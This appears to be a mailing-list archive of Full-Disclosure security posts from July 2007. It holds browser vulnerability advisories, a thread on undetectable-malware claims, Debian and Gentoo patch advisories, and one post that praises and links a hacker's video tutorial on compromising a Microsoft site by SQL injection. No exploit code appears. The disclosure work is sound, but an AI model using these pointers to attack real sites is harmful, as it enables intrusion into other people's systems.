From zeroknock at secniche.org Sun Jul 1 17:53:42 2007
From: zeroknock at secniche.org (Aditya K Sood)
Date: Sun, 01 Jul 2007 09:53:42 -0700
Subject: [Full-disclosure] Advisory : Internet Explorer Zone Domain Specification DoS and Page Suppressing
Message-ID: <4687DC16.1030000@secniche.org>

Advisory : Internet Explorer Zone Domain Specification DoS and Page Suppressing
Severity : Intermediate
Version : IE 6.0 - 7.0
Dated : 18 June 2007

Explanation:

The vulnerability is present in the handling of domain names with different parameters [sub domains] when specified in the Intranet zone and the Restricted zone with different characters [*, .]. Internet Explorer shows weird behavior when opening those websites. The problem occurs in the loading of those websites, thereby resulting in DoS through the browser.

The problem occurs in the resolving of domain names in different zones by the explorer. It can be launched remotely by a malicious attacker by exploiting this vulnerable behavior through a rogue script and registry functions. The problem persists if rogue entries or manipulated entries are subjected into various zones. So when a new instance of IE is loaded, the registry entries are triggered, thereby resulting in security impacts. The website page gets suppressed. The page hangs for some time, thereby showing a delay in loading the website, and affects the CPU load.

Vendor Status : Reported To Microsoft Security Center.

Solution By Microsoft Security Center:
1. Avoid visiting untrusted Websites.
2. Script Restriction should be applied.

-----
Aditya K Sood
http://www.secniche.org

From zeroknock at secniche.org Sun Jul 1 19:59:12 2007
From: zeroknock at secniche.org (Aditya K Sood)
Date: Sun, 01 Jul 2007 11:59:12 -0700
Subject: [Full-disclosure] DOS on phrack?
In-Reply-To: <4685F3A5.6010902@bellsouth.net>
References: <4685F3A5.6010902@bellsouth.net>
Message-ID: <4687F980.5090106@secniche.org>

Yup Scott, the problem is there.
Regards
Aditya K Sood
http://www.secniche.org

scott wrote:
> It seems that Phrack.org is experiencing a serious DoS. I tried a few
> times to connect today to no avail.
>
> Not to increase traffic to the DoS, is anyone else also experiencing the
> same?
>
> Regards,
> Scott
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From ascii at katamail.com Sun Jul 1 02:17:41 2007
From: ascii at katamail.com (ascii)
Date: Sun, 01 Jul 2007 03:17:41 +0200
Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities
In-Reply-To:
References:
Message-ID: <468700B5.7080202@katamail.com>

carl hardwick wrote:
> PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html
>
> The vulnerability allows the attacker to silently redirect focus of
> selected key press events to an otherwise protected file upload form
> field. This is possible because of how onKeyDown event is handled,
> allowing the focus to be moved between the two. This enables the
> attacker to read arbitrary files on victim's system.
many thanks for sharing this : )
it's a pretty serious vulnerability as said by Zalewski

regards,
Francesco `ascii` Ongaro
http://www.ush.it

From tyoptyop at gmail.com Sun Jul 1 00:17:57 2007
From: tyoptyop at gmail.com (Guasconi Vincent)
Date: Sun, 1 Jul 2007 01:17:57 +0200
Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities
In-Reply-To:
References:
Message-ID: <985b1a3d0706301617y6d8d7933m1b5ca8ff52d726b0@mail.gmail.com>

On 6/30/07, carl hardwick wrote:
> New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities:
> This demo is very simple. When you input some text in the textarea,
> the file input element's value will also change to it. I tested it on
> Firefox 1.5.0.12 and 2.0.0.4.
>
> PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html

Is there a link between your POC and this: http://lcamtuf.coredump.cx/focusbug/ ?

> credits by - Hong

mmmhh...

--
Guasconi Vincent
Student.
http://altmylife.blogspot.com

From tyoptyop at gmail.com Sun Jul 1 00:26:38 2007
From: tyoptyop at gmail.com (Guasconi Vincent)
Date: Sun, 1 Jul 2007 01:26:38 +0200
Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities
In-Reply-To: <468700B5.7080202@katamail.com>
References: <468700B5.7080202@katamail.com>
Message-ID: <985b1a3d0706301626s37d60e9cv1d7f677c56daac20@mail.gmail.com>

On 7/1/07, ascii wrote:
> carl hardwick wrote:
>> PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html
>> The vulnerability allows the attacker to silently redirect focus
>> [...]
>
> many thanks for sharing this : )
> it's a pretty serious vulnerability as said by Zalewski

Pretty serious for you, me, and some others.
0.02$ that it will never be patched.

--
Guasconi Vincent
Student.
http://altmylife.blogspot.com

From tyoptyop at gmail.com Sun Jul 1 00:33:28 2007
From: tyoptyop at gmail.com (Guasconi Vincent)
Date: Sun, 1 Jul 2007 01:33:28 +0200
Subject: [Full-disclosure] Month of Random Hashes: DAY SEVENTEEN
In-Reply-To: <597552.86081.qm@web38006.mail.mud.yahoo.com>
References: <20070630062356.9CA17DA820@mailserver8.hushmail.com> <597552.86081.qm@web38006.mail.mud.yahoo.com>
Message-ID: <985b1a3d0706301633x6f670462ya8a3368f5e2cc9d2@mail.gmail.com>

On 6/30/07, Leet Sixteen wrote:
> can someone please explain why a bunch of random
> hashes are posted every day in this mailing list?
>
> what is the significance of the random hashes and why
> should i read them every day?

42

--
Guasconi Vincent
Student.
http://altmylife.blogspot.com

From jam at zoidtechnologies.com Sun Jul 1 02:06:20 2007
From: jam at zoidtechnologies.com (Jeff MacDonald)
Date: Sat, 30 Jun 2007 21:06:20 -0400
Subject: [Full-disclosure] DOS on phrack?
In-Reply-To: <4685F3A5.6010902@bellsouth.net>
References: <4685F3A5.6010902@bellsouth.net>
Message-ID: <200706302106.21784.jam@zoidtechnologies.com>

On Saturday 30 June 2007 2:09 am, scott wrote:
> It seems that Phrack.org is experiencing a serious DoS. I tried a few
> times to connect today to no avail.
>

why is it that when a website is unavailable, the immediate assumption is that it is being attacked?

regards,
--
Jeff MacDonald, Zoid Technologies
"Web Applications That Suck Less"

From mwollenweber at gmail.com Sun Jul 1 02:28:06 2007
From: mwollenweber at gmail.com (matthew wollenweber)
Date: Sat, 30 Jun 2007 21:28:06 -0400
Subject: [Full-disclosure] iPhone Roadblock
Message-ID: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com>

I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of "smartphones" that never seemed quite right, the iPhone really seems to have hit the mark.
My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum...

I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a hard drive. I couldn't find any options in iTunes, and in Linux I only got:

Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15
Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone
Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc.
Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789
Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices

USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so?

Thanks for any help.

--
Matthew Wollenweber
mwollenweber at gmail.com | mjw at cyberwart.com
www.cyberwart.com

From pferrie at symantec.com Sun Jul 1 07:04:24 2007
From: pferrie at symantec.com (Peter Ferrie)
Date: Sat, 30 Jun 2007 23:04:24 -0700
Subject: [Full-disclosure] Rutkowska faces '100% undetectable malware' challenge, teasing?
References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com>
Message-ID:

The problem is that she wants the money upfront, in order to develop the 100% undetectable thing that she doesn't have right now. So that's a problem.
________________________________

From: full-disclosure-bounces at lists.grok.org.uk on behalf of Trey Keifer
Sent: Sat 6/30/2007 1:39 PM
To: Bipin Gautam
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure]Rutkowska faces '100% undetectable malware' challenge, teasing?

Joanna has stated her technical requirements for the challenge and Thom and group have accepted them, so why not turn this into what it really is... a bet.

The losing team agrees to pay the other $350,000 - if both groups are really so confident there shouldn't be any issue.

On 6/30/07, Bipin Gautam wrote:

hi guys,

ref: http://blogs.zdnet.com/security/?p=334

so are they teasing by making her the impossible challenge at this date? :)

honeypot developers have been trying to battle the same issue of making the virtual machine emulate the guest OS like it is run on real hardware for some years now.

ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf

But if Rutkowska or anyone is able to succeed in making it undetectable on current hardware, that would be genius!

-bipin

From redhowlingwolves at bellsouth.net Sun Jul 1 07:56:22 2007
From: redhowlingwolves at bellsouth.net (scott)
Date: Sun, 01 Jul 2007 02:56:22 -0400
Subject: [Full-disclosure] Rutkowska faces '100% undetectable malware' challenge, teasing?
In-Reply-To:
References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com>
Message-ID: <46875016.1060800@bellsouth.net>

It sounds to me like you fellas have never been to, or even read, her website. Ya know, Invisiblethings.org? Maybe you've never heard of Blue Pill. Or Red Pill. Or maybe it's a waste of time to tell you.
There are some methods involving timing to detect, possibly, these types of things, but they are easily defeated.

Scott

Peter Ferrie wrote:
> The problem is that she wants the money upfront, in order to develop the 100% undetectable thing that she doesn't have right now. So that's a problem.
>
> ________________________________
>
> From: full-disclosure-bounces at lists.grok.org.uk on behalf of Trey Keifer
> Sent: Sat 6/30/2007 1:39 PM
> To: Bipin Gautam
> Cc: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure]Rutkowska faces '100% undetectable malware' challenge, teasing?
>
> Joanna has stated her technical requirements for the challenge and Thom and group have accepted them, so why not turn this into what it really is... a bet.
>
> The losing team agrees to pay the other $350,000 - if both groups are really so confident there shouldn't be any issue.
>
> On 6/30/07, Bipin Gautam wrote:
>
> hi guys,
>
> ref: http://blogs.zdnet.com/security/?p=334
>
> so are they teasing by making her the impossible challenge at this date? :)
>
> honeypot developers have been trying to battle the same issue of
> making the virtual machine emulate the guest OS like it is run on real
> hardware for some years now.
>
> ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf
>
> But if Rutkowska or anyone is able to succeed in making it undetectable
> on current hardware, that would be genius!
>
> -bipin
From redhowlingwolves at bellsouth.net Sun Jul 1 05:17:41 2007
From: redhowlingwolves at bellsouth.net (scott)
Date: Sun, 01 Jul 2007 00:17:41 -0400
Subject: [Full-disclosure] DOS on phrack?
In-Reply-To: <200706302106.21784.jam@zoidtechnologies.com>
References: <4685F3A5.6010902@bellsouth.net> <200706302106.21784.jam@zoidtechnologies.com>
Message-ID: <46872AE5.4010308@bellsouth.net>

Possibly because I am a paranoid phreak who thinks security is a way to get around this problem?

Or just maybe I should have added... or just down for maintenance?... to my original post. That way smart asses like yourself wouldn't need to waste their time responding to such a despot as me.

Sorry to waste your time so you could waste more time by replying in such an unambiguous way!

Ooops. There's my Xanax. I knew I needed it!

Bad day. Sorry for the rant. ^~^

scott

Jeff MacDonald wrote:
> why is it that when a website is unavailable, the immediate assumption is that
> it is being attacked?
>
> regards,

From waldoalvarez00 at gmail.com Sun Jul 1 10:29:31 2007
From: waldoalvarez00 at gmail.com (wac)
Date: Sun, 1 Jul 2007 05:29:31 -0400
Subject: [Full-disclosure] Rutkowska faces ‘100% undetectable malware’ challenge, teasing?
In-Reply-To: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com>
References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com>
Message-ID:

Blah blah blah. Please someone tell Rutkowska that we have known about what she calls "blue pill" since we were little kids. It was exposed *years ago* (1995 to be exact, > 12 years) by Mark A. Ludwig in his Giant Book of Computer Viruses, page 391, from American Eagle Publications, Inc., chapter "Protected mode stealth". Basically it was moving the operating system into userland and running the virus in ring-0, making it almost undetectable. It was called Isnt not blue whatever. Yes, well, with Vanderpool technology it should be a lot easier given the hardware support. And guess what... we are still alive even with a POC virus and its source code available to the public. I hate that kind of noisy sensationalist press so much. That guy is always doing it. And btw I don't believe such a thing to be totally undetectable. There's always a little catch.

Regards
Waldo

On 6/30/07, Bipin Gautam wrote:
>
> hi guys,
>
> ref: http://blogs.zdnet.com/security/?p=334
>
> so are they teasing by making her the impossible challenge at this date?
> :)
>
> honeypot developers have been trying to battle the same issue of
> making the virtual machine emulate the guest OS like it is run on real
> hardware for some years now.
>
> ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf
>
> But if Rutkowska or anyone is able to succeed in making it undetectable
> on current hardware, that would be genius!
>
> -bipin

From hackthegov at googlemail.com Sun Jul 1 15:20:31 2007
From: hackthegov at googlemail.com (HACK THE GOV)
Date: Sun, 1 Jul 2007 15:20:31 +0100
Subject: [Full-disclosure] phrack / n3td3v
Message-ID:

hey hey,

is there a connection between these people? curious. we've ruled out gobbles is n3td3v but maybe phrack is n3td3v or n3td3v is phrack.

yours
hackthegov

From secadmin at netsecdesign.com Sun Jul 1 17:26:35 2007
From: secadmin at netsecdesign.com (Security Admin (NetSec))
Date: Sun, 1 Jul 2007 09:26:35 -0700
Subject: [Full-disclosure] How to compromise a Microsoft site using SQL injection
In-Reply-To:
References:
Message-ID: <8D870AB38C30EC4C848A11A3F83D20D806074474F8@exchange2007.mmicmanhomenet.local>

http://www.zone-h.org/content/view/14780/31/

Has the explanation, and a place to upload the HOW-TO video (with test explanation) from the hacker, http://www.unbase.com/n/5725974396

Better than any class I have taken on Web application security. It is nice to know that SQL Server 2005 has its issues just like every other database server.
BTW, the hacker has a hotmail address in the HOW-TO video for you to contact him :)

SecAdmin

From kf_lists at digitalmunition.com Sun Jul 1 18:34:37 2007
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Sun, 1 Jul 2007 13:34:37 -0400
Subject: [Full-disclosure] iPhone Security Settings
In-Reply-To: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com>
References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com>
Message-ID:

While you are at it...

http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-3538.20070629.B7vXa/iPhone1,1_1.0_1A543a_Restore.ipsw

-KF

On Jun 29, 2007, at 8:10 PM, John Smith wrote:
> http://www.andrew.cmu.edu/user/xsk/iPhoneSecuritySettings.html
>
> John

From jam at zoidtechnologies.com Sun Jul 1 18:37:22 2007
From: jam at zoidtechnologies.com (Jeff MacDonald)
Date: Sun, 1 Jul 2007 13:37:22 -0400
Subject: [Full-disclosure] DOS on phrack?
In-Reply-To: <46872AE5.4010308@bellsouth.net>
References: <4685F3A5.6010902@bellsouth.net> <200706302106.21784.jam@zoidtechnologies.com> <46872AE5.4010308@bellsouth.net>
Message-ID: <200707011337.23046.jam@zoidtechnologies.com>

On Sunday 01 July 2007 12:17 am, scott wrote:
> Possibly because I am a paranoid phreak who thinks security is a way to
> get around this problem?
>

well, posting that a website is under an attack without any evidence is a little skimp on details, particularly for this list, don't you think?

I was obviously too quick to respond. I shall attempt to be a little more considerate in the future.

regards,
--
Jeff MacDonald, Zoid Technologies
"Web Applications That Suck Less"

From skx at debian.org Sun Jul 1 18:56:28 2007
From: skx at debian.org (Steve Kemp)
Date: Sun, 1 Jul 2007 18:56:28 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1326-1] New fireflier-server packages fix unsafe temporary files
Message-ID: <20070701175628.GA22103@steve.org.uk>

------------------------------------------------------------------------
Debian Security Advisory DSA-1326                   security at debian.org
http://www.debian.org/security/                              Steve Kemp
July 01, 2007
------------------------------------------------------------------------

Package        : fireflier-server
Vulnerability  : insecure temporary files
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2007-2837

Steve Kemp from the Debian Security Audit project discovered that fireflier-server, an interactive firewall rule creation tool, uses temporary files in an unsafe manner which may be exploited to remove arbitrary files from the local system.

For the old stable distribution (sarge) this problem has been fixed in version 1.1.5-1sarge1.

For the stable distribution (etch) this problem has been fixed in version 1.1.6-3etch1.

For the unstable distribution (sid) this problem will be fixed shortly.

We recommend that you upgrade your fireflier-server package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
--------------------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.
Debian GNU/Linux 4.0 alias etch
-------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_mipsel.deb Size/MD5 checksum: 126054 51aa1ce345ea539a46ff4fc5a8353c6f http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_mipsel.deb Size/MD5 checksum: 67824 a5e8bcabc6192397f6701ebd62466a0c powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 65700 ae5de1b34ce04bdcb9f47a644b145548 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 122762 3631252bcd61ca3f01d2ee0403ee8730 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 62716 4abac4b6596b76653ca790c226095171 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 49218 e9e2fa7a61de8ad67360c5b034f83694 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_s390.deb Size/MD5 checksum: 109020 dbd1d3274cedec161eec4a25b0a79ece http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_s390.deb Size/MD5 checksum: 59542 8a39c0ef45c9890646da6c9d5a93d3f4 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_s390.deb Size/MD5 checksum: 47148 cd7df14ccffcdec9cb8f769777d066ee http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_s390.deb Size/MD5 checksum: 63242 7678da0d666839e0e458c5c5c8a49e22 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 63500 303fc154d47f870590584a7cc3cb7bd2 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 44856 
efdcc4126731ed16f10260e7900c697a http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 66338 f440f822c71d8c2ee0654390426b0207 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 119628 cd5422a03308735ed84a6877c9dff8c6 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGh+kcwM/Gs81MDZ0RAg3PAJ4icO89eII8+VulxB6hLaQRyuab2wCgp1sk FMz7IO3dcqVDnD1iNJ09mFw= =JTG+ -----END PGP SIGNATURE----- From skx at debian.org Sun Jul 1 19:50:24 2007 From: skx at debian.org (Steve Kemp) Date: Sun, 1 Jul 2007 19:50:24 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1327-1] New gsambad packages fix unsafe temporary files Message-ID: <20070701185024.GA31614@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1327 security at debian.org http://www.debian.org/security/ Steve Kemp July 01, 2007 - ------------------------------------------------------------------------ Package : gsambad Vulnerability : insecurity temporary files Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-2838 Steve Kemp from the Debian Security Audit project discovered that gsambad, a GTK+ configuration tool for samba, uses temporary files in an unsafe manner which may be exploited to truncate arbitary files from the local system. For the stable distribution (etch) this problem has been fixed in version 0.1.4-2etch1. 
For the unstable distribution (sid) this problem will be fixed shortly.

We recommend that you upgrade your gsambad package.

Upgrade instructions
- --------------------

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1.diff.gz
    Size/MD5 checksum: 24766 8ac63c3ecf53c7243f6f8675d3e2bb48
http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1.dsc
    Size/MD5 checksum: 609 35dc69c7f48b6b327b782d310037eac6
http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4.orig.tar.gz
    Size/MD5 checksum: 385776 ced255218e024b43de6d42c9fc1653d2

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_alpha.deb
    Size/MD5 checksum: 109878 5aadc8c608d516df18c4bffb0cee70a9

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_amd64.deb
    Size/MD5 checksum: 92416 9f332e4530c72917193402535c9f83e4

arm architecture (ARM)

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_arm.deb
    Size/MD5 checksum: 88570 7f540eb27987fe1d8130279f1a3f41e1

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_i386.deb
    Size/MD5 checksum: 93918 4f47a220caba72b7daadf205545dd214

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_ia64.deb
    Size/MD5 checksum: 120170 68f5483b3c10a787b7d8c6f3a7a39a34

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_mipsel.deb
    Size/MD5 checksum: 87426 7f4408ddd5cb502067dcea364344cfe8

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_powerpc.deb
    Size/MD5 checksum: 92822 4995be1a528256e86bb254dee1b0cc0f

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_s390.deb
    Size/MD5 checksum: 85148 8ad37130b346472026e0171d09036729

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_sparc.deb
    Size/MD5 checksum: 87174 b4a354e57e38c7dcaad14bff8a183975

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGh/dAwM/Gs81MDZ0RAmahAKDiHd4jeEEP7/2szSHWbjEe0XWKzQCfZq9F
J2BGQIUY5fRnFXthRMTUQv8=
=i6Ld
-----END PGP SIGNATURE-----

From skx at debian.org Sun Jul 1 20:12:18 2007
From: skx at debian.org (Steve Kemp)
Date: Sun, 1 Jul 2007 20:12:18 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1328-1] New unicon-imc2 packages fix buffer overflow
Message-ID: <20070701191218.GA32613@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1328                    security at debian.org
http://www.debian.org/security/                                Steve Kemp
July 01, 2007
- ------------------------------------------------------------------------

Package        : unicon-imc2
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2007-2835

Steve Kemp from the Debian Security Audit project discovered that unicon-imc2, a Chinese input method library, makes unsafe use of an environmental variable, which may be exploited to execute arbitrary code.

For the stable distribution (etch) this problem has been fixed in version 3.0.4-11etch1.

For the unstable distribution (sid) this problem will be fixed shortly.

We recommend that you upgrade your unicon-imc2 package.

Upgrade instructions
- --------------------

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:

http://security.debian.org/pool/updates/main/u/unicon/unicon_3.0.4-11etch1.diff.gz
    Size/MD5 checksum: 14966 c3a081d69f9f81055de331690bf85e70
http://security.debian.org/pool/updates/main/u/unicon/unicon_3.0.4.orig.tar.gz
    Size/MD5 checksum: 5704272 dfb8650debe038f85270b4ad60ad313b
http://security.debian.org/pool/updates/main/u/unicon/unicon_3.0.4-11etch1.dsc
    Size/MD5 checksum: 603 711b8ba2894e03f257f7d6a74f526563

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_alpha.deb
    Size/MD5 checksum: 4376642 8cfd1066d51dc11862115179be4ce4e4

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_amd64.deb
    Size/MD5 checksum: 4362080 bad015c61850c9a4fe5d85edc77073fd

arm architecture (ARM)

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_arm.deb
    Size/MD5 checksum: 4152566 0d8b6a4a3bab316d49eea2211affea61

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_hppa.deb
    Size/MD5 checksum: 4546634 dbdc37a0fb794ac2d806a1c960ff7c43

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_i386.deb
    Size/MD5 checksum: 4153202 24ddede20e4b9ad3b15694275ad9d597

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_ia64.deb
    Size/MD5 checksum: 4387184 c9494e9f38687b4cafb6b291942ddf6a

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_mipsel.deb
    Size/MD5 checksum: 4159956 05c58cfe2805a3cd5a20171943e241c4

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_powerpc.deb
    Size/MD5 checksum: 4516520 cb01b1bbc9bf724b7c6e97231945a964

s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_s390.deb
    Size/MD5 checksum: 4544838 7c2e4aa746330e0d94417a7254f03714

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_sparc.deb
    Size/MD5 checksum: 4501702 246893314e59799c4cabc3353fa8998f

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGh/x0wM/Gs81MDZ0RAhBEAKCTnKdYgVekvJvX8B9cz2r++tdoowCgsjNn
x0APOWgiDchUvmcOce+s4Hc=
=6JOd
-----END PGP SIGNATURE-----

From falco at gentoo.org Sun Jul 1 22:41:31 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sun, 1 Jul 2007 23:41:31 +0200
Subject: [Full-disclosure] [ GLSA 200707-01 ] Firebird: Buffer overflow
Message-ID: <20070701214131.GB5598@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Gentoo Linux Security Advisory                           GLSA 200707-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

  Severity: High
     Title: Firebird: Buffer overflow
      Date: July 01, 2007
      Bugs: #181811
        ID: 200707-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Synopsis
========

A vulnerability has been discovered in Firebird, allowing for the execution of arbitrary code.

Background
==========

Firebird is an open source relational database that runs on Linux, Windows, and various UNIX systems.
Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  dev-db/firebird       < 2.0.1                            >= 2.0.1

Description
===========

